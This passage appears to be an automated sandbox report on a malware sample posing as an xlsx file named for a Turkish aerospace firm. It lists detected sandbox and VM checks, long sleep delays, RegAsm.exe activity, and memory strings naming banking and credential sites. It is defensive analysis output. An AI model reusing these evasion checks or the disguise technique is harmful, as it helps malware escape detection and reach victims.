Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: 2A1FAF10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory allocated: 2A1FC770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 13F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2D70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599742	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597496	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597357	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596961	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596840	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596733	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594838	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594605	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594325	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593745	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593531	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3191			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 6632			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6476	Thread sleep count: 3191 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6476	Thread sleep count: 6632 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -599742s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -599625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -599391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -599281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -598952s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -597496s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -597357s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -597122s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -596961s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -596840s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -596733s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -595640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -594838s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -594605s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -594325s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -594003s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -593875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -593745s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -593641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2232	Thread sleep time: -593531s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599742	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597496	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597357	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596961	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596840	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596733	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594838	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594605	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594325	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593745	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593531	Jump to behavior

Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
